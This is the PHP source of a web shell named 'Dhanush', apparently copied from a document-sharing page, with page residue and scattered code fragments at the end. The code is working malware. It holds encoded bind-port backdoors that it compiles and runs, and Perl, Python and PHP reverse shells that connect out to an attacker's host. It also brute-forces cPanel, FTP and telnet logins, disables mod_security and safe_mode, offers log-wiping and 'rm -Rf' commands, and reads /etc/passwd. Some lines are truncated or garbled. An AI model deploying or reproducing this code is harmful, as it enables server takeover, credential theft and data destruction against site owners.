$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ
0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziy
aTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6d
WPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOn
XNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro32
8zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9k
Z7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2Ucuxwdwa
hbOy+0C63v0PNw8PwP";
$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS
753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJv
M3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LK
h/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3Z
LXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWA
DxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTo
grGFCoL7/9Bg==";
shellstyle();
?>
<div align="center">
<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="te
xt-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </f
ont></a>
</div>
<hr color="#1B1B1B">
<table cellpadding="0" style="width:100%;">
<tr>
<td colspan="2" style="width:75%;">System Info : <font class="tx
t"><?php systeminfo(); ?></font></td>
<td style="width:10%;">Server Port : <font class="txt"><?php ser
verport(); ?></font></td>
<td style="width:15%;"><a href=# onClick="maindata('com')"><font
class="txt"><i>Software Info</i></font></a></td>
</tr>
<?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
<td style="width:75%;" colspan="2">Uid : <font class="txt"><?php
echo shell_exec("id"); ?></font></td>
<?php $d0mains = @file("/etc/named.conf");
$users=@file('/etc/passwd');
if($d0mains)
{
$count;
{
if(@ereg("zone",$d0main))
{
preg_match_all('#zone "(.*)"#', $d0main,
$domains);
flush();
{
flush();
$count++;
}
}
}
?><td colspan=2 style="width:75%;">Websites : <font class="txt">
<?php echo "$count Domains"; ?></font></td><?php
}
else if($users)
{
$file = fopen("/etc/passwd", "r");
while(!feof($file))
{
$s = fgets($file);
$matches = array();
$matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(str
len($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches ==

"etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matc
hes == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches =
= "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "
var/www" || $matches == "var/named")
continue;
$count++;
}
?><td colspan=2 style="width:75%;">Websites : <font class="txt"
><?php echo "$count Domains"; ?></font></td><?php } ?>
</tr><?php } ?>
<tr>
<td style="width:20%;">Disk Space : <font class="txt"><?php echo
HumanReadableFilesize(diskSpace()); ?></font></td>
<td style="width:20%;">Free Space : <font class="txt"><?php echo
HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); e
cho " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
<td style="width:20%;">Server IP : <font class="txt"><a href="ht
tp://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font>
</td>
<td style="width:15%;">Your IP : <font class="txt"><a href="http
://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
</tr>
<tr>
<?php if($os == 'Windows'){ ?><td style="width:15%;">View Direct
ories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
<td style="width:30%;">Current Directory : <span id="crdir"><fon
t color="#009900">
<?php
$d = str_replace("\\",$directorysperator,$dir);
if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode($directorysperator,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
$t = '';
$j = 0;
foreach ($e as $r)
{
$t.= $r.$directorysperator;
if ($j == $i) {break;}
$j++;
}
$href=addslashes($t);
echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><
b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>
';
$i++;
}
?>
</font></span> <a href=# onClick="gethome('home','<?php echo add
slashes(getcwd()); ?>')">[Home]</a></td>
<td style="width:20%;">Disable functions : <font class="txt"><?p
hp echo getDisabledFunctions(); ?> </font></td>
<td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td

>
<?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?dow
nloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
</tr>
</table>
<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'seci
nfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zo
ne-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Ex
ploit'=>'exploit','Connect'=>'connect');
$m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malat
tack','Cpanel Cracker'=>'cpanel','About'=>'about');
echo "<table border=3 style=border-color:#333333; width=100%; cellpaddin
g=2>
<tr>";
$menu = '';
foreach($m1 as $k => $v)
$menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindat
a('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
echo $menu;
echo "</tr>
</table>
<div style=\"float:left;\">
<a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </
font></a>
<a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] <
/font></a>
<a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; ce
llpadding=2>
<tr align=center>";
foreach($m2 as $k => $v)
$menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"mainda
ta('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]<
/font></a></td>";
echo $menu1;
echo "<td style=\"border:none;\"><a href=javascript:void(0) onCl
ick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfk
ill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
<td style=\"border:none;\"><a href=\"$self?logout\"><font class=
mainmenu>[LogOut]</font></a></td>
</tr>
</table>";?>
<div id="showmaindata"></div>
<?php
if(isset($_GET["downloadit"]))
{
$FolderToCompress = getcwd();
execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
$prd=explode("/","backup.tar");
for($i=0;$i<sizeof($prd);$i++)
{
$nfd=$prd[$i];
}
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".filesize($nfd));
header("Content-disposition: attachment; filename=\"".$nfd."\";");
readfile($nfd);
exit;
}
//Turn Safe Mode Off
if(getDisabledFunctions() != "None" || safe() != "OFF")
{
$file_pointer = fopen(".htaccess", "w+");
fwrite($file_pointer, "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule> \n\r");
$file_pointer = fopen("ini.php", "w+");
fwrite($file_pointer, "<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>");
$file_pointer = fopen("php.ini", "w+");
fwrite($file_pointer, "safe_mode
Off");
fclose($file_pointer);
}
else if(isset($_POST['cpanelattack']))
{
if(!empty($_POST['username']) && !empty($_POST['password']))
{
$userlist=explode("\n",$_POST['username']);
$passlist=explode("\n",$_POST['password']);
if($_POST['cracktype'] == "ftp")
{
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password
)
{
$purepass = trim($passwo
rd);
ftp_check($_POST['target
'],$pureuser,$purepass,$connect_timeout);
}
}
}
if ($_POST['cracktype'] == "cpanel" || $_POST['c
racktype'] == "telnet")
{
if($cracktype == "telnet")
$cpanel_port="23";
else
$cpanel_port="2082";
foreach ($userlist as $user)
{
$pureuser = trim($user);
echo "<b><font face=Tahoma style
=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-s
ize: 9pt\" color=#FF0800>
Processing user $pureuser ...</f
ont></b><br><br>";
foreach ($passlist as $password
)
{
$purepass = trim($passwo
rd);
cpanel_check($_POST['tar
get'],$pureuser,$purepass,$connect_timeout);
}
}
}
}
else
$bdmessage = "<center>Enter Username & Password
List<center>";
}
else if(isset($_GET['info']))
{
$bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("wh
ois ".$_GET['info']))."</font></div>";
}
else if(isset($_POST['u']))
{
$path = $_REQUEST['path'];
if(is_dir($path))
{
$setuploadvalue = 0;
$uploadedFilePath = $_FILES['uploadfile']['name'];
$tempName = $_FILES['uploadfile']['tmp_name'];
if($os == "Windows")
$uploadPath = $path . $directorysperator . $uploadedFilePat
h;
else if($os == "Linux")
$uploadPath = $path . $directorysperator . $upl
oadedFilePath;
if($stat = move_uploaded_file($_FILES['uploadfile']['tmp
_name'] , $uploadPath))
$bdmessage = "<font class=txt size=3><blink>File uploade
d to $uploadPath</blink></font>";
else
$bdmessage = "<font size=3><blink>Failed to upload file to $upl
oadPath</blink></font>";
}
?><script type="text/javascript">changedir('dir','<?php echo addslashes(
$path); ?>'); </script><?php
}
else if(isset($_POST['backdoor']))
{
if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lan
g']))
{
?><script type="text/javascript">gethome('connect');</script><
?php
$passwd = $_POST['passwd'];
if($_POST['lang'] == 'c')
{
{
@$fh=fopen(getcwd()."/backp.c",'w');
@fwrite($fh,gzinflate(base64_decode($bind_port_c
)));
@fclose($fh);
execmd("chmod 0755 ".getcwd()."/backp.c");
execmd("gcc -o ".getcwd()."/backp ".getcwd()."/b
ackp.c");
execmd("chmod 0755 ".getcwd()."/backp");
execmd(getcwd()."/backp"." ".$_POST['port']." ".
$passwd ." &");
$scan = exec_all("ps aux | grep backp".$_POST['p
ort']);
if(eregi("backp".$_POST['port'],$scan))
$bdmessage = "Process found running, bac
kdoor setup successfully.";
else
$bdmessage = "Process not found running,
backdoor not setup successfully.";
}
else
{
@$fh=fopen("/tmp/backp.c","w");
@fwrite($fh,gzinflate(base64_decode($bind_port_c
)));
@fclose($fh);
execmd("chmod 0755 /tmp/backp.c");
execmd("gcc -o /tmp/backp /tmp/backp.c");
$out = execmd("/tmp/backp"." ".$_POST['port']."
". $passwd ." &");
$scan = exec_all("ps aux | grep backp".$_POST['p
ort']);
if(eregi("backp".$_POST['port'],$scan))
$bdmessage = "Process found running, bac
kdoor setup successfully.";
else
$bdmessage = "Process not found running,
backdoor not setup successfully.";
}
}
if($_POST['lang'] == 'perl')
{
{
@$fh=fopen(getcwd()."/bp.pl",'w');
@fwrite($fh,gzinflate(base64_decode($bind_port_p
)));
@fclose($fh);
execmd("chmod 0755 ".getcwd()."/bp.pl");

execmd("perl ".getcwd()."/bp.pl ".$_POST['port']
." ". $passwd ." &");
$bdmessage = "<pre>$out\n".execmd("ps aux | grep
bp.pl")."</pre>";
}
else
{
@$fh=fopen("/tmp/bp.pl","w");
@fwrite($fh,gzinflate(base64_decode($bind_port_p
)));
@fclose($fh);
execmd("chmod 0755 ".getcwd()."/bp.pl");
execmd("perl ".getcwd()."/bp.pl ".$_POST['port']
." ". $passwd ." &");
$bdmessage = "<pre>$out\n".execmd("ps aux | grep
bp.pl")."</pre>";
}
}
}
}
else if(isset($_POST['backconnect']))
{
if($_POST['ip'] != "" && $_POST['port'] != "")
{
?><script type="text/javascript">gethome('connect');</script><?php
$host = $_POST['ip'];
$port = $_POST['port'];
if($_POST["lang"] == "perl")
{
{
@$fh=fopen(getcwd()."/bc.pl",'w');
@fwrite($fh,gzuncompress(base64_decode($backconn
ect_perl)));
@fclose($fh);
$bdmessage = "<font color='#FFFFFF'>Trying to co
nnect...</font>";
execmd("perl ".getcwd()."/bc.pl $host $port &",
$disable);
if(!@unlink(getcwd()."/bc.pl")) echo "<font colo
r='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></
br>";
}
else
{
@$fh=fopen("/tmp/bc.pl","w");
@fwrite($fh,gzuncompress(base64_decode($backconn
ect_perl)));
@fclose($fh);
$bdmessage = "<font color='#FFFFFF'>Trying to co
nnect...</font>";
execmd("perl /tmp/bc.pl $host $port &",$disable
);
if(!@unlink("/tmp/bc.pl"))
echo "<h2>Warning: Failed to delete reve
rse-connection program</h2></br>";
}
}
else if($_POST["lang"] == "python")
{
{
$w_file=@fopen(getcwd()."/bc.py","w") or die(my
sql_error());
if($w_file)
{
@fputs($w_file,gzuncompress(base64_deco
de($back_connect_p)));
@fclose($w_file);
chmod(getcwd().'/bc.py', 0777);
}
execmd("python ".getcwd()."/bc.py $host $port
&",$disable);
$bdmessage = "<font color='#FFFFFF'>Trying to c
onnect...</font>";
if(!@unlink(getcwd()."/bc.py"))
rse-connection program</h2></br>";
}
else
{
$w_file=@fopen("/tmp/bc.py","w");
if($w_file)
{
@fputs($w_file,gzuncompress(base64_deco
de($back_connect_p)));
@fclose($w_file);
chmod('/tmp/bc.py', 0777);
}
execmd("python /tmp/bc.py $host $port &",$disa
ble);
$bdmessage = "<font color='#FFFFFF'>Trying to c
onnect...</font>";
if(!@unlink("/tmp/bc.py"))
rse-connection program</h2><br>";
}
}
else if($_POST["lang"] == "php")
{
$bdmessage = "<font color='#FFFFFF'>Trying to connect...
</font>";
$ip = $_POST['ip'];
$port=$_POST['port'];
$sockfd=fsockopen($ip , $port , $errno, $errstr );
if($errno != 0)
{
$bdmessage = "<font color='red'><b>$errno</b> :
$errstr</font>";
}
else if (!$sockfd)
{
$result = "<p>Fatal : An unexpected error was
occured when trying to connect!</p>";
}
else
{
fputs ($sockfd ,"\n=============================

====================================\nCoded By Arjun\n==========================
=======================================");
$pwd = exec_all("pwd");
$sysinfo = exec_all("uname -a");
$id = exec_all("id");
$len = 1337;
fputs($sockfd ,$sysinfo . "\n" );
fputs($sockfd ,$pwd . "\n" );
fputs($sockfd ,$id ."\n\n" );
fputs($sockfd ,$dateAndTime."\n\n" );
while(!feof($sockfd))
{
$cmdPrompt ="(dhanush)[$]> ";
fputs ($sockfd , $cmdPrompt );
$command= fgets($sockfd, $len);
fputs($sockfd , "\n" . exec_all($command) . "\n\
n");
}
fclose($sockfd);
}
}
}
}
else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is
_numeric($_GET['val2']))
{
$temp = "";
for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
{
$uid = @posix_getpwuid($_GET['val1']);
if ($uid)
}
echo '<br/>';
paramexe('Users', $temp);
}
else if(isset($_GET['download']))
{
download();
}
else
{
?><script type="text/javascript">gethome('home','<?php echo addslashes($
dir); ?>');</script><?php
}
$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"&l
t; not writable >";
?>
</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
<table style="width:100%;border-color:#333333;" border="1">
<tr>
<td align="center">
<form method="post" enctype="multipart/form-data">
Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
<input type=submit value="Upload" name="u" value="u" class="but" ></form>
<span name="wrtble"><?php
echo $is_writable; ?></span>
<br>
</td>
<td align="center" style="height:105px;">Create File :
<form onSubmit="createdir('Create',createfile.value);return false;">
<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>"
name="createfile" id="createfile">
<input type="button" onClick="createdir('Create',createfile.value)" value="Creat
e" class="but">
</form><span name="wrtble">
<?php echo $is_writable; ?></span>
</td>
</tr>
<tr>
<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile
('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
<input type="text" class="box" name="execute">
<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
<input type="button" onClick="executemyfile('execute',exepath.value,execute.val
ue)" value="Execute" class="but"></form></td>
<td align="center">Create Directory : <form onSubmit="createdir('createfolder',c
reatefolder.value);return false;">
<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box"
name="createfolder" id="createfolder">
<input type="button" onClick="createdir('createfolder',createfolder.value)" valu
e="Create" class="but">
</form><span name="wrtble"><?php
echo $is_writable;
?></span></td></tr>
<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="ge
texploit(wurl.value,path.value,functiontype.value);return false;">
<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.
c">
<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.va
lue)" value="
G0
" class="but"><br><br>
<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directo
rysperator; ?>">
<select name="functiontype" class="sbox">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select>
</form><div id="showexp"></div>
</td>
<td align="center">
<form>
Some Commands<br>
<?php if($os != "Windows")
{ ?>
<SELECT NAME="mycmd" class="box">
<OPTION VALUE="uname -a">Kernel version
<OPTION VALUE="w">Logged in users
<OPTION VALUE="lastlog">Last to connect
<option value='cat /etc/hosts'>IP Addresses
<option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
<OPTION VALUE="logeraser">Log Eraser
<OPTION VALUE="find / -perm -2 -ls">Find all writable directories
<OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Cu

rrent Folder
<OPTION VALUE="find / -type f -name \"config*\"">find config* files
<OPTION VALUE="find . -type f -name \"config*\"">find config* files in
current dir
<OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in curr
ent dir
<OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
<OPTION VALUE="find / -user root -perm -022">find all sgid files
<OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in curr
ent dir
<OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/l
ocal/sbin -perm -4000 2> /dev/null">Suid bins
<OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD
!
<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
<?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases
">List of Cpanel`s domains(valiases)</option><?php } ?>
<?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/
vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
<OPTION VALUE="which wget curl w3m lynx">Downloaders?
<OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
<OPTION VALUE="ps aux">Show running proccess
<OPTION VALUE="uptime">Uptime check
<OPTION VALUE="cat /proc/meminfo">Memory check
<OPTION VALUE="netstat -an | grep -i listen">Open ports
<OPTION VALUE="rm -Rf">Format box (DANGEROUS)
<OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WI
PELOGS PT1 (If wget installed)
<OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
<OPTION VALUE="./zap2">WIPELOGS PT3
<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
</SELECT>
<?php } else {?>
<SELECT NAME="mycmd" class="box">
<OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current d
irectory
<OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
<OPTION VALUE="systeminfo">System Informations
<OPTION VALUE="net user">User accounts
<OPTION VALUE="netstat -an">Open ports
<OPTION VALUE="getmac">Get Mac Address
<OPTION VALUE="net start">Show running services
<OPTION VALUE="net view">Show computers
<OPTION VALUE="arp -a">ARP Table
<OPTION VALUE="tasklist">Show Process
<OPTION VALUE="ipconfig/all">IP Configuration
</SELECT>
<?php } ?>
<input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>
">
<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)
" value="Execute" class="but">
</form>
</td>
</tr></table><br>
</td>
</tr>
</table>
<?php
//logout
if(isset($_GET['logout']))
{
setcookie("hacked",time() - 60*60);
header("Location:$self");
ob_end_flush();
}
?>
<hr color="#1B1B1B">
<div align="center">
<font size="6" face="Times New Roman, Times, serif" color="#00CC00">ध&#234
4;ुष<br>
--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%
9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><fo
nt color="#FF0000" size="6">जय हिन्द</
font></a></div>
<?php
}
}
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
{
setcookie("hacked", md5($pass));
$selfenter = $_SERVER["PHP_SELF"];
header("Location:$selfenter");
}
}
if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
{
shellstyle();
?>
<center>
<form method="POST">
<div style="background-color:#171717; width:50%; border-radius:7px; marg
in-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Window
s_7_-_Alien_from_outer_space.jpg);">
<table cellpadding="9" cellspacing="4">
<tr>
<td align="center" colspan="2"><blink><font size
="7"><b>Dhanush</b></font></blink></td>
</tr>
<tr>
<td align="right"><b> </b></td>
<td><input style="visibility:hidden" type="text"
name="uname" style="background-color:#333333; border-radius:7px; -moz-border-ra
dius:10px; border-color:#000000; width:170px; color:#666666;" value="Jijle3" on
Focus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}"
onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#82828
2';}" AUTOCOMPLETE="OFF"></td>
</tr>
<tr>
<td align="right"><b> </b></td>
<td><input style="visibility:hidden" type="text"
name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-r
adius:10px; border-color:#000000; width:170px; color:#666666;" value="Jijle3" o
nFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}
" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#8282
82';}" AUTOCOMPLETE="OFF"></td>
</tr>
<tr>
<td align="center" colspan="2"><input type="subm
it" class="but" value=" CLIQUEZ POUR ENTRER "></td>
</tr>
<tr>
<td align="center" colspan="2"><font size="6" fa
ce="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
</tr>
<tr>
<td colspan="2"><font size="4" face="Times New R
oman, Times, serif"><noscript>Enable Javascript in your browser for the proper w
orking of the shell</noscript></font></td>
</tr>
</table>
</div>
</form>
</center>
<br>
</body>
</html>
<?php
}
?>

Danush

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Danush

Uploaded by

Copyright:

Available Formats

<?

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

<td><input type="button" onClick="viewtables('cr

echo '<pre class=ml1><font color =lime s

<tr style="background-color:#0C0C0C;" onMouseOver="style

checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir .

$t = preg_match('/\/(.*?)\:\//s', $s, $matches);

echo "not writable directory";

if(strlen($matches) > 12 || strlen($matc

if(strlen($matches) > 12 || strlen($matc

$query = "UPDATE ".$prefix."boards SET name='$head', des

echo("<br>[-] index.php Not found in Theme Edito

// Evaluate PHP CoDE!

right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="

<div id="joomla" style="display:none;"><

echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br

echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/myd

<input type="button" OnClick="by

<option value="7" >Web Server external module intrusion<

value="8" >Mail Server intrusion</option>

<input style="margin : 20px; margin-left

<input type="hidden" name="exploit">

<form method='post' >

----- --------------------------- -------------- ------- ---- -------------------------------- --- -- ------------------</pre></font></div></center>

mysql_select_db( $dbname, $mysqlHandle );

echo "<br><div><font color=white size=3>[ $dbname ]</fon

$sql = mysql_query("SELECT $rowid FROM $

global $queryStr, $action, $mysqlHandle, $dbname, $table

"<table cellspacing=1 cellpadding=2 border=1>\n";

$pResult = mysql_db_query( $dbname, "SHOW fields FROM $t

$num = mysql_num_rows( $pResult );

$str .= " " . $fieldname . " = '" . $arrdata . "'";

var params = "content="+content+"&file="+file;

ajaxRequest = new XMLHttpRequest();

ajaxRequest = new XMLHttpRequest();

ajaxRequest = new XMLHttpRequest();

len($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches ==

<td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td

execmd("chmod 0755 ".getcwd()."/bp.pl");

fputs ($sockfd ,"\n=============================

<OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Cu

You might also like